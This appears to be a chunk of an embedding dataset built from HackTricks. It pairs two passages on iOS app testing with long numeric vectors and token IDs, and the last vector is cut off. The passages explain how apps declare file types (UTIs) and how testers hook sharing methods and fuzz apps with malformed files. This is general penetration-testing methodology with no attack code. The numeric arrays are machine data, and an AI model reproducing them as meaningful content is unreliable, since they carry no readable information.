plugins, extensions, and so on. utimportedtypedeclarations : you use utimportedtypedeclarations do teach the system about utis that you want to be known in the system but that are not your utis. e. g. : your app is able to read the proprietary data format of another application, yet you don't know if that application is even installed on the system. cfbundledocumenttypes : you use cfbundledocumenttypes to tell the system which document types your app is able to open. unless you also list your utis here, these utis are not associated with your app in finder and your app won't appear in the open with > menu. the only thing you always
[ -0.17428529262542725, -0.5901913642883301, 0.14214803278446198, 0.13608184456825256, -0.6518563032150269, 0.4702361226081848, 0.4812532961368561, 0.0653819814324379, 0.3087948262691498, 0.8862817287445068, 0.06202138587832451, 0.04974524304270744, 0.8230974674224854, -0.45494964718818665, -0.583929717540741, 0.04676346480846405, -0.3516971170902252, -0.1833571046590805, -0.5841812491416931, -0.015247510746121407, 0.028850093483924866, 0.38626348972320557, -0.47979816794395447, -0.2612322270870209, -0.03275873139500618, -0.19828170537948608, 0.4725024104118347, -0.0571848601102829, 1.0022351741790771, 0.8334952592849731, -0.20988857746124268, -0.15819300711154938, 0.030970534309744835, -0.27326735854148865, -0.07899852842092514, -0.13562920689582825, 0.8993138670921326, 0.03628445789217949, 0.3471175730228424, -0.19255569577217102, 0.18693247437477112, 0.06257495284080505, -0.1569080501794815, -0.4233197867870331, -0.7748454809188843, -0.07769759744405746, -0.7168540954589844, -0.008242892101407051, 0.7185090780258179, 0.08283417671918869, 0.45041659474372864, 0.3458198010921478, -0.4986892640590668, -0.04899642989039421, 0.5981515645980835, 0.12181729078292847, -0.3490554690361023, 0.010123969987034798, -0.3059806823730469, 0.4721287786960602, -0.5823205709457397, 0.5083263516426086, 0.35729366540908813, -0.40676349401474, 0.1396597921848297, 0.2477148026227951, -0.20713627338409424, 0.0021096242126077414, 0.4031243622303009, -0.38808053731918335, 0.01937384344637394, 0.4213019907474518, 0.1068253368139267, -0.8052984476089478, -0.3834850788116455, 0.3422221541404724, 0.45073115825653076, -0.10662518441677094, -0.3299958109855652, 0.4236549437046051, -0.4959043562412262, 0.4341466426849365, 0.2506321370601654, -0.34075838327407837, -0.7297728061676025, 0.21892637014389038, 0.01783711090683937, 0.2676372826099396, 0.5577497482299805, -0.07678292691707611, 0.4281511604785919, 0.39052101969718933, -0.6951555013656616, -0.614524245262146, 0.6567173004150391, 0.6855740547180176, -0.9519227743148804, 0.0617176853120327, 0.24964766204357147, 0.2481900006532669, 1.0555124282836914, 0.8369535803794861, 0.6296200752258301, 0.6995007991790771, -0.24835951626300812, 0.49287092685699463, 0.025966495275497437, -0.22549015283584595, -0.5271579623222351, -0.3342701196670532, 0.48120102286338806, -0.35761404037475586, 0.4547104835510254, -0.8464918732643127, 0.010242028161883354, 0.02966318093240261, -0.178921177983284, 0.545728325843811, -0.894707441329956, 0.7717393636703491, 0.07777921855449677, -0.1926073431968689, 0.036469653248786926, -0.21987316012382507, 0.04517264664173126, 0.21139822900295258, -0.13128986954689026, 0.5333136320114136, -0.17953014373779297, -0.36307117342948914, -0.2519826292991638, -0.5710614919662476, -0.040430761873722076, 0.907098114490509, -0.44464465975761414, 0.5733360648155212, 0.4632686674594879, 0.687929093837738, 0.47778981924057007, -0.5841816067695618, 0.08670784533023834, 0.887966513633728, -0.24326568841934204, 0.8157596588134766, 0.46798449754714966, 0.3945558965206146, -0.28825047612190247, -0.238562673330307, -0.21051369607448578, 0.256848007440567, -0.09056799858808517, 0.2574786841869354, 0.8424972295761108, -0.08137667924165726, -0.2923462390899658, 0.614716112613678, -0.34491267800331116, 0.22020921111106873, -0.26732054352760315, 0.02896476536989212, -0.018888046965003014, 1.1216585636138916, 0.5063148140907288, -0.060063570737838745, -0.3931657671928406, 0.09606550633907318, -0.511842668056488, -0.03459669277071953, -0.4031772017478943, -0.1740812510251999, 0.3847105801105499, -0.019408049061894417, -0.7029486894607544, 0.29663583636283875, 1.2049596309661865, 1.1630843877792358, 0.654793381690979, 0.2257518172264099, -0.01340388972312212, 0.8589970469474792, -0.07539135962724686, -0.04473984241485596, 0.37876567244529724, 0.9204778075218201, -0.5826202034950256, 0.7091430425643921, -0.13491924107074738, -0.5921171307563782, 0.17702652513980865, 0.10367467254400253, -0.03599594160914421, 0.13944393396377563, -0.5720261931419373, 0.6930888891220093, -0.080441914498806, -0.31208744645118713, -1.1258854866027832, 0.21742330491542816, -0.1947561353445053, -1.714119791984558, -0.8684786558151245, 0.3928605318069458, -0.7915292978286743, 0.49784040451049805, -0.46559077501296997, -0.012006430886685848, -0.13873934745788574, 0.13374194502830505, -0.02443542331457138, 0.7628165483474731, 0.9931866526603699, -0.029722366482019424, -0.6332761645317078, 0.07730302214622498, 0.08191274851560593, -0.003589767264202237, 0.1982710063457489, 0.537787139415741, -0.8357755541801453, 0.1282629668712616, -0.2800764739513397, 0.08369375020265579, 1.3529982566833496, 0.2023444026708603, -0.017325948923826218, -0.14454346895217896, 0.3472527861595154, 0.7917866706848145, -0.7823705673217773, 0.11716009676456451, -0.42041632533073425, 0.5311129093170166, 0.7205583453178406, 0.9202573895454407, 0.622676432132721, -0.2619480490684509, 0.5877219438552856, 0.32006263732910156, 0.726788341999054, 0.09747600555419922, -0.3671303391456604, 0.5417556762695312, 0.07741308957338333, 0.15655368566513062, 0.33603447675704956, -0.13107742369174957, -0.11112992465496063, 0.04031875357031822, 0.5377365946769714, 0.6343150734901428, -0.5639771819114685, 0.0502995140850544, 0.5515710711479187, 0.030160710215568542, -1.2789807319641113, -0.5386844277381897, 0.6306453943252563, 0.711256742477417, -1.0490459203720093, -0.6123037934303284, 0.5986250638961792, 0.0465201772749424, -0.3737279772758484, 0.16418075561523438, 0.055765651166439056, 0.2151874601840973, -0.1940373331308365, 0.727603554725647, 0.26641130447387695, -0.5556657314300537, -0.7572285532951355, -0.21557174623012543, -1.1920465230941772, -0.8270696401596069, -0.6139703392982483, 0.00011419961811043322, -0.343707799911499, -0.33578717708587646, 0.155326709151268, -0.11886831372976303, -0.29613518714904785, -0.5136503577232361, 0.2360190898180008, 0.30497708916664124, -0.07431231439113617, 0.4683237075805664, -0.5007814168930054, 0.5065322518348694, -0.3252374827861786, 0.7793344855308533, 0.17912505567073822, -0.2698436379432678, -0.9302891492843628, -0.814797043800354, 0.14934049546718597, 0.02352866902947426, 0.05460232123732567, 0.20172546803951263, -0.39081183075904846, 0.0313631072640419, 0.19542264938354492, -0.8449307680130005, 0.6238566040992737, 0.33370181918144226, -0.25033068656921387, 0.1579008400440216, -0.04325803369283676, -0.07299873232841492, 0.31604987382888794, 0.0239621140062809, -0.07683087885379791, -0.07566109299659729, 0.21476124227046967, 0.9867051243782043, -0.9105725884437561, -0.23416168987751007, 0.62321937084198, 0.1418507695198059, -0.4518398344516754, 0.025645148009061813, -0.012372158467769623, -0.3274606168270111, 0.28521156311035156, 0.07011641561985016, -0.15949440002441406, 0.2257058471441269, -0.18337170779705048, -1.545952558517456, 0.23863141238689423, -0.5098332166671753, -0.5565967559814453, -0.5449508428573608, -0.44384685158729553, 0.44235724210739136, -0.23145852982997894, -0.11039687693119049, -0.170744389295578, -0.29571712017059326, -0.16090962290763855, -0.47699880599975586, -0.08837782591581345, -0.15891039371490479, -0.6812760829925537, 0.009482938796281815, -0.35567253828048706, 0.9337444305419922, -0.22061151266098022, -0.31294527649879456, 0.46214672923088074, -0.8995212912559509, 0.16603736579418182, 0.04694797098636627, -0.06192950904369354, 0.3449907600879669, 0.7362415194511414, 0.7305399179458618, -0.2772532105445862, -0.19226163625717163, 0.15587615966796875, -0.002479052636772394, 0.3843173384666443, 0.2440805584192276, 0.22164537012577057, -0.17398199439048767, -0.3453100621700287, -0.506292462348938, 0.5194817185401917, 0.387871116399765, 0.7638630270957947, -0.3845008909702301, 0.5593075156211853, -0.48703905940055847, -0.02863946370780468, 0.39725881814956665, -0.48539412021636963, -0.8750326037406921, 0.7972564697265625, 0.48378676176071167, 0.7084906101226807, -0.7348973155021667, -0.021224211901426315, -0.0024819537065923214, -0.07495888322591782, 0.39062875509262085, -0.23434333503246307, 0.05661294236779213, -0.6378861665725708, -0.6758813858032227, -0.36515164375305176, -0.6241824626922607, 0.03343913331627846, 0.2080840766429901, 0.7327019572257996, -0.23369917273521423, -0.9807144403457642, -0.9513078927993774, 0.6200929880142212, 1.0074129104614258, 0.6087890267372131, 0.5255283713340759, 0.7031875848770142, 0.18421737849712372, 0.08758804947137833, 0.06998174637556076, -0.12566398084163666, -0.17652030289173126, 0.16680364310741425, 0.42147427797317505, -0.4066550135612488, -0.6072776913642883, -0.5022225975990295, -0.4790060520172119, -0.8983516097068787, -0.30935871601104736, 0.353753924369812, 0.33038660883903503, -0.03998357430100441, 0.14694112539291382, -0.017749488353729248, 0.45787301659584045, -1.3566473722457886, -0.34704598784446716, -0.9393013119697571, -0.2513813376426697, 0.4256711006164551, -0.2530074119567871, -0.08688484132289886, -0.43216341733932495, 0.6023477911949158, 0.3883642852306366, 0.04129188880324364, -0.9330390095710754, -0.2758031487464905, -0.2771982252597809, -0.7502968907356262, 0.11264442652463913, 1.0555962324142456, 0.13640443980693817, 0.5523097515106201, -0.7027788162231445, 0.22782504558563232, 0.787193775177002, -0.7542705535888672, -0.33154675364494324, -0.4805007874965668, 0.09188218414783478, 0.10613369941711426, 0.4514734447002411, -0.1358519345521927, -0.019327234476804733, 0.30151793360710144, -1.103393316268921, 0.24073649942874908, -0.7151194214820862, -0.48266300559043884, 0.10309191048145294, -0.2284589558839798, -0.264847993850708, 0.33712300658226013, -0.5943212509155273, -0.2012721449136734, -0.25846993923187256, 0.7101796865463257, -0.10173635929822922, -0.6414102911949158, 0.8965350985527039, -0.023088572546839714, -0.2475833296775818, 0.8269398808479309, 0.3393993377685547, -0.14618684351444244, 0.23260106146335602, -0.13729949295520782, -0.6902092695236206, 0.4993003308773041, -0.7393920421600342, 0.1410212516784668, 0.19638432562351227, 0.031216666102409363, -0.5509602427482605, -0.614766001701355, 0.7099473476409912, 0.12870848178863525, 0.2325058877468109, -0.23511675000190735, -0.35986074805259705, 0.0363064706325531, -0.0743153989315033, -0.7499343156814575, 0.7340511679649353, 0.4457697570323944, -0.5600323677062988, -0.17804178595542908, -0.10792848467826843, -0.62919682264328, -0.4923725128173828, -0.19747747480869293, 0.03498595207929611, 0.039132483303546906, 0.279647558927536, 0.6460136771202087, -0.09851033240556717, -0.6758456826210022, 0.3796742558479309, 0.177098348736763, 0.48594778776168823, -0.9173156023025513, 0.09269342571496964, -0.2524639368057251, -0.1449156105518341, -0.4609246551990509, 0.7351938486099243, 0.17635557055473328, -0.17898203432559967, 0.21823187172412872, 0.1394062042236328, 0.3819551467895508, -0.4752463698387146, -1.0980477333068848, 0.3179384469985962, -0.5397137999534607, -0.4950908124446869, -0.4695051312446594, -0.09654182940721512, 0.8016651272773743, 0.22367727756500244, -0.25203585624694824, -0.2259545624256134, -0.9967851042747498, -0.7324544191360474, 0.41920119524002075, -0.5177901387214661, 0.17927105724811554, -0.5129518508911133, -0.5025421977043152, -0.07213795185089111, 0.9076133370399475, -0.11416535824537277, -1.1757087707519531, 0.19328488409519196, -0.24004341661930084, 0.2222186028957367, -0.30016976594924927, -0.06239140033721924, -0.16525444388389587, -0.4461718797683716, -0.6471983194351196, 0.1399756819009781, -0.2331199198961258, -0.27114200592041016, -0.33089756965637207, -0.22084227204322815, 0.02747846022248268, -0.31495487689971924, -0.3016410171985626, 0.011658062227070332, -0.191653311252594, -0.08244876563549042, -1.2005493640899658, 0.2012554258108139, -0.2149186134338379, 0.9314495921134949, -0.5319768190383911, -0.1314154863357544, -0.1418050229549408, -0.10463206470012665, -0.12322947382926941, 0.1499963402748108, 0.366370290517807, -0.2444608062505722, -0.07266387343406677, -0.1453961580991745, 0.7321343421936035, 0.24616791307926178, -0.06224376708269119, -0.9255627393722534, -0.008402559906244278, -0.9620949625968933, -0.8765553832054138, 0.8459968566894531, -0.20398621261119843, 0.20214128494262695, -0.07252437621355057, -0.23741431534290314, -0.2842040956020355, -0.015766853466629982, -0.21952176094055176, 0.810508668422699, -0.04727238789200783, -0.3693607449531555, -0.4620629549026489, 0.6826326847076416, 0.04586822912096977, 0.3452170789241791, 0.6274434924125671, -0.17231813073158264, 0.1900721788406372, 0.4249461591243744, -0.48005446791648865, -0.042163580656051636, -0.37768304347991943, 0.2713015675544739, -0.08523649722337723, 0.14354154467582703, 0.3845156133174896, 0.27428409457206726, -0.9428465962409973, -0.08067742735147476, -0.22626273334026337, -0.3254247307777405, -0.20207318663597107, 1.169205665588379, 0.45231449604034424, -0.11151070892810822, -0.04671178013086319, -0.5889082551002502, 0.4156736135482788, -0.15802107751369476, 0.8139972686767578, 0.2747613489627838, -0.652823805809021, 1.2889747619628906, 0.3872835338115692, -0.5614170432090759, -0.045010197907686234, 0.16472353041172028, 0.06609611213207245, -0.3020407259464264, -0.2973915934562683, -0.26721712946891785, 0.3502674996852875, 0.010330107063055038, -0.5246478319168091, 0.39350035786628723, -0.16410435736179352, 0.4080066978931427, -0.8332792520523071, 0.682127833366394, -0.34030118584632874, 0.11950258165597916, 0.16861014068126678, -0.7201313972473145, -0.8713383674621582, 0.14843514561653137, 0.4606519937515259, 0.10460342466831207, 0.6104639768600464, 0.7021029591560364, -0.37006640434265137, 0.059383705258369446, 0.06960967928171158, -0.1953047662973404, 0.3674820363521576, -0.005318074952811003, 0.1696426272392273, 0.11986427754163742, -0.06992661952972412, -0.830549418926239, -0.4793471395969391, 0.4485061764717102, 0.07542833685874939, 0.3276568651199341, 0.07916677743196487, 0.21621078252792358, -0.013534815981984138, 0.4759647846221924, 0.1219172403216362, -0.6329248547554016, -0.5962300300598145, -0.7562997937202454, -0.09587510675191879, 0.0751880556344986, -0.3324478566646576, 0.16918876767158508, 0.8362236618995667, -0.3403906226158142, -0.3462539315223694, -0.2085191011428833, 0.29576346278190613, 0.6115273237228394, 0.01832743175327778, -1.021291732788086, 0.40118709206581116, -0.7415676712989807, -0.8739699721336365, -0.3841838538646698, -0.13075335323810577, -0.16892768442630768, -0.17790497839450836, -0.687512218952179, 0.11912931501865387, -0.3376080393791199, 0.3599371910095215, -0.27295246720314026, 0.03494308143854141, -0.6424676775932312, -0.6029249429702759, 0.5194866061210632, 0.9919358491897583, -0.30651912093162537, -0.2362283617258072, 0.5348190069198608, 0.28619545698165894, 0.3070111572742462, 0.1513034552335739, 0.01829640008509159, -0.44569262862205505, 0.06961463391780853, 0.5517562031745911, 0.3680890202522278, -0.444597065448761, 0.027967236936092377, 0.33043956756591797, -1.00215482711792, -0.07443817704916, -0.24064737558364868, -0.3151114881038666, 0.3494066298007965, 0.1388365775346756, -0.319857656955719, 0.6459277868270874, 0.8135435581207275, 0.5643289089202881, -0.7588125467300415, 0.34561651945114136, 0.6027125120162964, 0.43745630979537964, 0.4422770142555237, 0.21664564311504364, -0.09194491058588028, -0.43448349833488464, 0.3421251177787781, 0.26908019185066223, -0.7272849082946777, 1.0372822284698486, -0.19576893746852875, 0.5405547618865967, -0.31546133756637573, -0.04668717086315155, 0.3351416289806366, 0.24756495654582977, 0.7021915316581726, 0.24242959916591644, 0.46062222123146057, -0.09464515000581741, -0.7646991610527039, -0.08411411195993423, -0.6204248070716858, -0.8117779493331909, 0.5237435102462769, -0.9965006113052368, -0.5890015959739685, -0.1795949637889862, -0.6425714492797852, 0.35609403252601624, -0.20162005722522736, -0.2977055013179779, 0.055559951812028885, 0.24638675153255463, -0.37278661131858826, 0.5596269369125366, -1.2068322896957397, 0.1812884658575058, 0.07167043536901474, 0.14286883175373077, -0.32322102785110474, -0.6749598383903503, 0.31635117530822754, 0.8803344368934631, 0.4172103703022003, 0.05614156648516655, -0.41491442918777466, 0.2633441686630249, -0.1709386259317398, 0.0889614000916481, 0.37411969900131226, -0.0933084711432457, -0.8479068279266357, 0.0732218399643898, -0.6394820213317871, 0.2521229684352875, -0.7051990032196045, -0.40884292125701904, 0.07197683304548264, -0.1273598074913025, 0.16893444955348969, 0.8008114099502563, 0.2286234050989151, 0.0934080109000206, 0.8362935781478882, 0.23023512959480286, 0.8434424996376038, -0.057294078171253204, -0.45989754796028137, 0.13919341564178467, 0.46085110306739807, -0.1132514551281929, 0.8332298994064331, -0.35298487544059753, 0.6565778255462646, 0.6714271306991577, -0.3285994231700897, 0.0360637865960598, 0.5851361155509949, 0.04581546038389206, 0.1995450258255005, 0.12615258991718292, -0.8395553231239319, -0.09507342427968979, 0.1509820967912674, -0.651073694229126, 0.07328713685274124, 0.2158287912607193, 0.11961404234170914, -0.09018290787935257, -0.37016019225120544, 0.33942103385925293, -0.6000432968139648, 0.2889711856842041, 0.12734849750995636, -0.2646774351596832, -0.15245987474918365, -0.06661470979452133, -0.49436959624290466, 0.2828283905982971, 0.7797143459320068, 0.692961573600769, 0.19687819480895996, 0.7109484076499939, -0.7902231812477112, 0.059720445424318314, 0.04135112091898918, -0.03843541070818901, -0.5433735847473145, 0.2625706195831299, -0.44910457730293274, -0.503332257270813, -0.6365945339202881, 0.2855587303638458, -0.2617747485637665, 0.022632362321019173, 0.36350104212760925, -0.12304253876209259, -0.14920632541179657, -0.4526589512825012, 0.18562275171279907, -0.45769035816192627, 0.2751484215259552, 0.0785878375172615, -0.42469972372055054, -0.6535797715187073, 0.7982166409492493, 0.029970940202474594, 0.7333853244781494, 0.4684801697731018, 0.32608354091644287, 0.31095027923583984, 0.8062793016433716, 0.39874404668807983, -0.24712613224983215, -0.2415371686220169, -0.19275851547718048, -0.0928351879119873, 0.026990452781319618, -0.19296826422214508, -0.23511545360088348, 0.23719468712806702, 0.8349794149398804, -0.7611901164054871, 0.12571211159229279, -0.2894399166107178, -0.481720507144928, -0.6163687109947205, 0.10940580070018768, -0.3627226948738098, -0.04382925480604172, -0.23150110244750977, 0.070857934653759, 0.10622742027044296, 0.018141044303774834, -0.48087939620018005, -0.5778296589851379, -0.5573766231536865, -0.2593195140361786, -0.5303095579147339, 0.7515994906425476, 0.012051546014845371, 0.18533921241760254, 0.4315568208694458, -0.8303403854370117, -0.3388011157512665, 0.2953328788280487, -0.037585098296403885, 0.17584796249866486, 0.3990718722343445, 0.16794292628765106, 0.4750547409057617, -0.03785845264792442, -0.15076513588428497, -0.37506914138793945, 0.21550333499908447, 0.7859911918640137, 0.0033264595549553633, 0.9397827982902527, 0.5086605548858643, -0.17070898413658142, 0.4624720513820648, -0.02227088250219822, 0.9069204330444336, -0.3392423391342163, -0.5143951773643494, -0.2352420538663864, -0.12311062961816788, -0.6604242920875549, -0.4678768515586853, -0.890478253364563, 0.29753246903419495, 0.022716224193572998, 0.14996302127838135, -0.7643321752548218, 0.35483619570732117, -0.7268750667572021, -0.03285086527466774, 0.3605778217315674, -0.049379002302885056, 0.09276359528303146, 0.009760111570358276, 0.9354649782180786, -1.3808035850524902, 4.447028636932373, 1.1320562362670898, 0.10022706538438797, 0.10194632411003113, 0.6505054235458374, 0.5609010457992554, 0.733640193939209, -0.40824779868125916, 0.16847388446331024, -0.19315876066684723, -0.05231213942170143, -0.8880541324615479, 0.22591327130794525, 0.6892008185386658, 0.17181827127933502, 0.5279018878936768, -0.5484450459480286, 0.19995489716529846, 0.328707218170166, -0.578938901424408, -0.9397416114807129, -0.033881671726703644, -0.3485158085823059, 1.0246256589889526, 0.16786129772663116, 0.17313988506793976, 0.6031099557876587, -0.5167303085327148, 0.06676327437162399, -0.6616865992546082, 0.4329703748226166, -0.14344681799411774, 0.24804426729679108, -0.7748399376869202, -0.5101194381713867, 0.057886313647031784, 0.1031622514128685, -0.7572441101074219, -0.2674799859523773, -0.17772525548934937, -0.09817687422037125, 0.028805457055568695, 0.08084560930728912, -0.30759865045547485, 0.35912826657295227, 1.022637128829956, -0.15550608932971954, 0.30694249272346497, 0.9786412119865417, -0.5595885515213013, 0.9312487244606018, -0.45772290229797363, 0.4652477204799652, -0.2720697820186615, -1.0862308740615845, 0.006322445347905159, -0.232982337474823, -0.6109991669654846, 0.1272631138563156, 0.10164949297904968, 0.8382551670074463, -0.5354449152946472, 0.32698574662208557, -0.21534842252731323, -0.6336917877197266, 0.2143944948911667, -0.5692879557609558, 0.5338144898414612, 0.1185460090637207, -0.29148662090301514, -0.42124271392822266, 0.37242403626441956, -0.2910880446434021, -0.49390143156051636, 0.8564634323120117, 0.13951022922992706, -0.12469345331192017, 0.3207152783870697, 0.062129538506269455, -0.8231136202812195, -0.03022247552871704, -0.6937312483787537, -0.6676860451698303, 0.27952030301094055, 0.595287024974823, 0.5880033373832703, -0.15844163298606873, -0.26633143424987793, 0.1571555733680725, 0.5508198738098145, 0.4889202415943146, 0.5907607078552246, -0.07965002954006195, 0.17018598318099976, -0.6508572697639465 ]
[ 1006, 2030, 2049, 2139, 28139, 12921, 2544, 21318, 29098, 19341, 3508, 9247, 29107, 2618, 4646, 1024, 2330, 3126, 2140, 1024, 3120, 29098, 19341, 3508, 1024, 5754, 17287, 3508, 1024, 1007, 1999, 1996, 10439, 11849, 1012, 2065, 2025, 2383, 1996, 3120, 3642, 2017, 2064, 2145, 2202, 1037, 2298, 2046, 1996, 18558, 1012, 20228, 2923, 5371, 1998, 3945, 2005, 1024, 21183, 10288, 6442, 2098, 13874, 3207, 20464, 25879, 8496, 1013, 21183, 5714, 6442, 2098, 13874, 3207, 20464, 25879, 8496, 2065, 1996, 10439, 18806, 15612, 1013, 10964, 7661, 6254, 4127, 1012, 12935, 27265, 3709, 10085, 27417, 15353, 10374, 2000, 2156, 2065, 1996, 10439, 27171, 2151, 6254, 4127, 2008, 2009, 2064, 2330, 1012, 1037, 2200, 3143, 7526, 2055, 1996, 2224, 1997, 2122, 6309, 2064, 2022, 2179, 2006, 9991, 7840, 12314, 2021, 2182, 2017, 2031, 1037, 12654, 1024, 21183, 10288, 6442, 2098, 13874, 3207, 20464, 25879, 8496, 1024, 2224, 2068, 2000, 9375, 2115, 2219, 21183, 2483, 2008, 2115, 10439, 4122, 2000, 6570, 1996, 2291, 2009, 2003, 5361, 2006, 1012, 2019, 21183, 2072, 5577, 1037, 3538, 1997, 2951, 1006, 2025, 9352, 2951, 2284, 2503, 1037, 5371, 999, 1007, 1998, 5942, 2012, 2560, 2019, 8909, 4765, 18095, 1006, 4012, 1012, 2742, 1012, 2026, 3597, 11614, 6790, 13874, 1007, 1012, 5678, 2009, 2089, 2031, 1037, 2171, 1006, 2026, 4658, 2951, 2828, 1007, 1010, 2028, 2030, 2062, 5371, 2171, 14305, 1006, 1012, 2026, 3597, 11614, 6790, 13874, 1007, 1010, 2028, 2030, 2062, 2771, 4168, 4127, 1006, 1060, 1011, 4646, 1013, 2026, 1011, 4658, 1011, 2951, 1011, 2828, 1007, 1010, 2028, 2030, 2062, 19351, 6277, 4127, 1006, 2109, 2043, 14391, 2951, 1997, 2008, 2785, 2478, 6100, 1004, 19351, 1007, 1010, 1998, 2028, 2030, 2062, 8027, 9808, 2828, 1012, 2788, 2017, 2036, 2215, 21183, 2483, 2000, 23758, 2000, 4493, 21183, 2483, 1006, 1041, 1012, 1043, 1012, 2043, 2017, 2360, 2115, 21183, 2072, 23758, 2015, 2000, 2270, 1012, 2951, 1010, 2151, 2832, 2008, 2064, 3066, 2007, 12391, 2951, 2064, 2036, 3066, 2007, 2115, 21183, 2072, 1007, 1012, 1041, 1012, 1043, 1012, 1024, 2017, 9375, 2115, 2219, 16350, 5371, 2951, 4289, 1998, 2017, 2215, 2023, 2951, 4289, 2000, 2022, 2036, 2124, 2000, 2060, 18726, 1010, 13354, 7076, 1010, 14305, 1010, 1998, 2061, 2006, 1012, 21183, 5714, 6442, 2098, 13874, 3207, 20464, 25879, 8496, 1024, 2017, 2224, 21183, 5714, 6442, 2098, 13874, 3207, 20464, 25879, 8496, 2079, 6570, 1996, 2291, 2055, 21183, 2483, 2008, 2017, 2215, 2000, 2022, 2124, 1999, 1996, 2291, 2021, 2008, 2024, 2025, 2115, 21183, 2483, 1012, 1041, 1012, 1043, 1012, 1024, 2115, 10439, 2003, 2583, 2000, 3191, 1996, 16350, 2951, 4289, 1997, 2178, 4646, 1010, 2664, 2017, 2123, 1005, 1056, 2113, 2065, 2008, 4646, 2003, 2130, 5361, 2006, 1996, 2291, 1012, 12935, 27265, 3709, 10085, 27417, 15353, 10374, 1024, 2017, 2224, 12935, 27265, 3709, 10085, 27417, 15353, 10374, 2000, 2425, 1996, 2291, 2029, 6254, 4127, 2115, 10439, 2003, 2583, 2000, 2330, 1012, 4983, 2017, 2036, 2862, 2115, 21183, 2483, 2182, 1010, 2122, 21183, 2483, 2024, 2025, 3378, 2007, 2115, 10439, 1999, 2424, 2121, 1998, 2115, 10439, 2180, 1005, 1056, 3711, 1999, 1996, 2330, 2007, 1028, 12183, 1012, 1996, 2069, 2518, 2017, 2467 ]
hack_tricks
432.txt
1
must set for a document type is the role. the role can be " viewer " ( you can display that file type but you cannot edit it ), " editor " ( you can display and edit that file type ), " none " ( it's not specified what you can do with that file ). e. g. : you want your app do be associated with certain file types, identified either by extension, by mime type, or by uti identifier. if you want your app to be associated with an uti type, the app should either import or export the type, as otherwise the type may not be known to the system and registering to unknown uti type has simply no effect at all. dynamic testingfor sending activities you can : hook the method we have seen in the static analysis ( init ( activityitems : applicationactivities : ) ) to get the activityitems and applicationactivities. find out the excluded activities by hooking excludedactivitytypes property. for receiving items you can : share a file with the app from another app or send it via airdrop or e - mail. choose the file so that it will trigger the " open with... " dialogue ( that is, there is no default app that will open the file, a pdf for example ). hook application : openurl : options : and any other methods that were identified in a previous static analysis. observe the app behavior. in addition, you could send specific malformed files and / or use a fuzzing technique. read how here. [SEP]
[ -0.13876082003116608, -0.16812899708747864, 0.2488439679145813, -0.014860100112855434, -0.4494819641113281, 0.24143366515636444, 0.10768453776836395, 0.04204889014363289, 0.4509856402873993, 1.2813416719436646, -0.13086006045341492, 0.6708327531814575, 1.1732951402664185, 0.1982765644788742, -0.9425549507141113, 0.2461245059967041, -0.21470919251441956, 0.1273690164089203, -0.24161063134670258, -0.030483189970254898, 0.2807031571865082, 0.7156068682670593, -0.8700516223907471, -0.027920588850975037, -0.3122936487197876, 0.19104288518428802, -0.2709343135356903, -0.14376670122146606, 1.1217796802520752, 1.0476047992706299, -0.1347973793745041, 0.6031574606895447, -0.04107939079403877, -0.07860009372234344, 0.04640471562743187, -0.4764630198478699, 0.7812088131904602, -0.06410880386829376, 0.025345969945192337, -0.9799754023551941, 0.4662879407405853, 0.1599726378917694, 0.4546932280063629, -0.5442240238189697, -1.4042621850967407, -0.05941907688975334, 0.18941202759742737, 0.23985400795936584, -0.036854684352874756, -0.3015040457248688, 0.36563512682914734, 0.9922797083854675, -0.2900241017341614, -0.17290891706943512, 0.10416899621486664, -0.284259170293808, 0.2185770869255066, -0.2638711631298065, -0.09300151467323303, 0.4184967577457428, -0.23957559466362, -0.24181495606899261, -0.012651595287024975, 0.04178785905241966, 0.42445582151412964, 1.0382884740829468, -0.8085128664970398, -0.2165670245885849, 0.2953668236732483, -0.013599926605820656, -0.48742666840553284, 0.7021187543869019, -0.24908344447612762, -0.779188871383667, -0.2965315282344818, -0.0014459240483120084, -0.0005502981366589665, 0.05226415768265724, 0.11914392560720444, 0.6904858946800232, -0.6695824265480042, 0.5060701966285706, 0.17317074537277222, -0.1710580438375473, -0.5822965502738953, 0.18649980425834656, 0.06580430269241333, -0.23199033737182617, 0.3661501407623291, -0.32187753915786743, -0.49043434858322144, 0.6985315680503845, 0.08771224319934845, -0.3346021771430969, 0.26089033484458923, 1.0170754194259644, -0.10551577806472778, 0.14974915981292725, 0.458225816488266, -0.07940095663070679, 0.757522463798523, 0.41967079043388367, -0.09534095972776413, 0.4630664587020874, -0.4099615216255188, 0.9722062945365906, 0.43633121252059937, -0.18916362524032593, -0.7887510061264038, -0.2879313826560974, -0.19077424705028534, -0.6706659197807312, -0.10175669193267822, -0.5825002789497375, -0.35543426871299744, 0.12198210507631302, 0.4768131673336029, 0.4705130457878113, -0.4290804862976074, -0.056386400014162064, 0.6093863844871521, 0.10494126379489899, -0.12139109522104263, -0.6457814574241638, -0.3792082965373993, 0.21861068904399872, -0.1665230095386505, 1.0414890050888062, 0.22820807993412018, 0.18054825067520142, -0.018141230568289757, -0.28024378418922424, 0.23838107287883759, 0.9840354323387146, -0.8396589159965515, 0.7240684032440186, 0.3549085557460785, -0.05878068879246712, 0.6441235542297363, -0.6958636045455933, -0.24528564512729645, 0.22653338313102722, -0.49504271149635315, 0.9325320720672607, -0.1132877841591835, 0.6237228512763977, 0.038110315799713135, -0.2248775213956833, -0.7329909801483154, 0.1330246478319168, 0.14932724833488464, 0.09250570088624954, 0.5973113179206848, 0.0183322224766016, -0.24244944751262665, 0.4521373510360718, 0.045820266008377075, -0.021338079124689102, 0.7260299921035767, 0.3815615475177765, -0.40876927971839905, 0.5208364129066467, -0.3057706952095032, -0.03233218938112259, -0.048756420612335205, 0.9685693979263306, -0.4123593270778656, -0.6505239605903625, 0.2808687686920166, 0.34656843543052673, 0.30201512575149536, 0.5871485471725464, -0.4548943340778351, 0.6202318668365479, 0.45583903789520264, -0.1748192310333252, 0.6465284824371338, 0.3115374743938446, 0.14681239426136017, 0.700427770614624, -0.11679574847221375, 0.008094311691820621, 0.9287226796150208, 0.4383195638656616, -0.26971137523651123, 0.40053683519363403, -0.3548462986946106, -0.22834797203540802, -0.5499797463417053, -0.18893155455589294, 0.1593584567308426, 0.6210671663284302, -0.5649691224098206, 0.5754345059394836, 0.2695256173610687, -0.14601418375968933, -1.0390762090682983, 0.04735448583960533, -0.14792177081108093, -0.8103684782981873, -1.2312085628509521, 0.5759797096252441, -0.4780403971672058, 0.2804645597934723, -0.6527450680732727, -0.39603331685066223, 0.00559631735086441, 0.7087798714637756, -0.21769903600215912, 0.3544680178165436, 0.28293710947036743, 0.20940163731575012, -0.8588525056838989, 0.09493616968393326, 0.636687159538269, 